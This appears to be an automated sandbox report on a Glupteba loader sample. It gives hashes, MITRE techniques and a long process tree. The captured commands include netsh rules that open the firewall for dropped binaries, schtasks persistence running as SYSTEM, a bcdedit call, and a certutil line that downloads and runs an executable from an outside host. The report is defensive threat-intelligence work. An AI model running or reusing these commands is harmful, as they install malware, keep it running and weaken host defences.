glupteba | 3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b

General

Target

3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
Size

3.8MB
MD5

0412c92d6c747349f46f50bfe3fe52b0
SHA1

eec6149ec7f28eaa2384b611480251746b80acc3
SHA256

3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b
SHA512

a77b1561342e2efb9b1e6ffb826c406bda0de34cd3ecae1b7593d7bb943bb1bf81bcd5e0a2a4659239e0b000e8dc67bc75fc4c6ab254821931a25ec50b7e8b18

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2564-132-0x0000000000400000-0x00000000036B8000-memory.dmp	family_glupteba

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

4376 bcdedit.exe

pid	process
4376	bcdedit.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4396	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4892	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4468	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
1856	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4284	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4220	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4520	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4864	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
1300	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
2252	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
1320	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
756	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
1440	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
3424	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
2044	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
3204	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4788	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
2968	2564	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
2724	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
2456	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
3616	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
820	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
1400	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4076	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
2288	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4692	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
3632	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
4456	1776	WerFault.exe	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
3700	3656	WerFault.exe	csrss.exe
4828	3656	WerFault.exe	csrss.exe
4428	3656	WerFault.exe	csrss.exe
4640	3656	WerFault.exe	csrss.exe
1952	3656	WerFault.exe	csrss.exe
4636	3656	WerFault.exe	csrss.exe
1272	3656	WerFault.exe	csrss.exe
4648	3656	WerFault.exe	csrss.exe
2936	3656	WerFault.exe	csrss.exe
2904	3656	WerFault.exe	csrss.exe
1460	3656	WerFault.exe	csrss.exe
3964	3656	WerFault.exe	csrss.exe
5012	3656	WerFault.exe	csrss.exe
676	3656	WerFault.exe	csrss.exe
3984	3656	WerFault.exe	csrss.exe
4320	3656	WerFault.exe	csrss.exe
4164	3656	WerFault.exe	csrss.exe
1484	3656	WerFault.exe	csrss.exe
4920	3656	WerFault.exe	csrss.exe
400	3656	WerFault.exe	csrss.exe
4080	3656	WerFault.exe	csrss.exe
1136	3656	WerFault.exe	csrss.exe
1396	3656	WerFault.exe	csrss.exe
1420	3656	WerFault.exe	csrss.exe
1404	3656	WerFault.exe	csrss.exe
4764	3656	WerFault.exe	csrss.exe
3948	3656	WerFault.exe	csrss.exe
3556	3656	WerFault.exe	csrss.exe
5000	3656	WerFault.exe	csrss.exe
1960	3656	WerFault.exe	csrss.exe
4452	3656	WerFault.exe	csrss.exe
3132	3656	WerFault.exe	csrss.exe
4172	3656	WerFault.exe	csrss.exe
3664	3656	WerFault.exe	csrss.exe
2808	3656	WerFault.exe	csrss.exe
3624	3656	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4360 schtasks.exe
844 schtasks.exe

pid	process
4360	schtasks.exe
844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe

pid	process
2564	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
2564	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2564	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
Token: SeImpersonatePrivilege	2564	3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
Token: SeTcbPrivilege	224	svchost.exe
Token: SeTcbPrivilege	224	svchost.exe

C:\Users\Admin\AppData\Local\Temp\3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
"C:\Users\Admin\AppData\Local\Temp\3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 368
2⤵
- Program crash
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 388
2⤵
- Program crash
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 376
2⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 608
2⤵
- Program crash
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 708
2⤵
- Program crash
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 728
2⤵
- Program crash
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 708
2⤵
- Program crash
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 752
2⤵
- Program crash
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 776
2⤵
- Program crash
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 800
2⤵
- Program crash
PID:2252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 848
2⤵
- Program crash
PID:1320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 692
2⤵
- Program crash
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 876
2⤵
- Program crash
PID:1440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 804
2⤵
- Program crash
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 752
2⤵
- Program crash
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 708
2⤵
- Program crash
PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 692
2⤵
- Program crash
PID:4788

C:\Users\Admin\AppData\Local\Temp\3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe
"C:\Users\Admin\AppData\Local\Temp\3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b.exe"
2⤵
PID:1776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 332
3⤵
- Program crash
PID:2724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 340
3⤵
- Program crash
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 584
3⤵
- Program crash
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 716
3⤵
- Program crash
PID:820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 708
3⤵
- Program crash
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 676
3⤵
- Program crash
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 732
3⤵
- Program crash
PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 676
3⤵
- Program crash
PID:4692

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:3136

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 340
3⤵
- Program crash
PID:3632

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes"
3⤵
PID:2028

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 368
4⤵
- Program crash
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 376
4⤵
- Program crash
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 540
4⤵
- Program crash
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 376
4⤵
- Program crash
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 560
4⤵
- Program crash
PID:1952

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 768
4⤵
- Program crash
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 892
4⤵
- Program crash
PID:1272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 884
4⤵
- Program crash
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 916
4⤵
- Program crash
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 908
4⤵
- Program crash
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 580
4⤵
- Program crash
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 948
4⤵
- Program crash
PID:3964

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 908
4⤵
- Program crash
PID:5012

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:4376

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 780
4⤵
- Program crash
PID:676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1032
4⤵
- Program crash
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 880
4⤵
- Program crash
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 956
4⤵
- Program crash
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 540
4⤵
- Program crash
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1132
4⤵
- Program crash
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 784
4⤵
- Program crash
PID:400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1152
4⤵
- Program crash
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 948
4⤵
- Program crash
PID:1136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1176
4⤵
- Program crash
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1548
4⤵
- Program crash
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1804
4⤵
- Program crash
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1824
4⤵
- Program crash
PID:4764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1804
4⤵
- Program crash
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1580
4⤵
- Program crash
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1572
4⤵
- Program crash
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1884
4⤵
- Program crash
PID:1960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1576
4⤵
- Program crash
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1688
4⤵
- Program crash
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1576
4⤵
- Program crash
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1744
4⤵
- Program crash
PID:3664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1616
4⤵
- Program crash
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1900
4⤵
- Program crash
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1640
4⤵
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 756
3⤵
- Program crash
PID:4456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 752
2⤵
- Program crash
PID:2968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2564 -ip 2564
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2564 -ip 2564
1⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2564 -ip 2564
1⤵
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2564 -ip 2564
1⤵
PID:1976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2564 -ip 2564
1⤵
PID:4068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2564 -ip 2564
1⤵
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2564 -ip 2564
1⤵
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2564 -ip 2564
1⤵
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2564 -ip 2564
1⤵
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2564 -ip 2564
1⤵
PID:400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2564 -ip 2564
1⤵
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2564 -ip 2564
1⤵
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2564 -ip 2564
1⤵
PID:3992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2564 -ip 2564
1⤵
PID:3956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2564 -ip 2564
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2564 -ip 2564
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2564 -ip 2564
1⤵
PID:4760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2564 -ip 2564
1⤵
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1776 -ip 1776
1⤵
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1776 -ip 1776
1⤵
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1776 -ip 1776
1⤵
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1776 -ip 1776
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1776 -ip 1776
1⤵
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1776 -ip 1776
1⤵
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1776 -ip 1776
1⤵
PID:5116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1776 -ip 1776
1⤵
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1776 -ip 1776
1⤵
PID:4028

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23.exe" enable=yes
1⤵
PID:1772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1776 -ip 1776
1⤵
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3656 -ip 3656
1⤵
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3656 -ip 3656
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3656 -ip 3656
1⤵
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3656 -ip 3656
1⤵
PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3656 -ip 3656
1⤵
PID:924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3656 -ip 3656
1⤵
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3656 -ip 3656
1⤵
PID:64

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3656 -ip 3656
1⤵
PID:1880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3656 -ip 3656
1⤵
PID:948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3656 -ip 3656
1⤵
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3656 -ip 3656
1⤵
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3656 -ip 3656
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3656 -ip 3656
1⤵
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3656 -ip 3656
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3656 -ip 3656
1⤵
PID:4168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3656 -ip 3656
1⤵
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3656 -ip 3656
1⤵
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3656 -ip 3656
1⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3656 -ip 3656
1⤵
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3656 -ip 3656
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3656 -ip 3656
1⤵
PID:1384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3656 -ip 3656
1⤵
PID:1320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3656 -ip 3656
1⤵
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3656 -ip 3656
1⤵
PID:3872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3656 -ip 3656
1⤵
PID:3956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3656 -ip 3656
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3656 -ip 3656
1⤵
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3656 -ip 3656
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3656 -ip 3656
1⤵
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3656 -ip 3656
1⤵
PID:2968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3656 -ip 3656
1⤵
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3656 -ip 3656
1⤵
PID:1948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3656 -ip 3656
1⤵
PID:2928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3656 -ip 3656
1⤵
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3656 -ip 3656
1⤵
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3656 -ip 3656
1⤵
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3656 -ip 3656
1⤵
PID:1268

Network

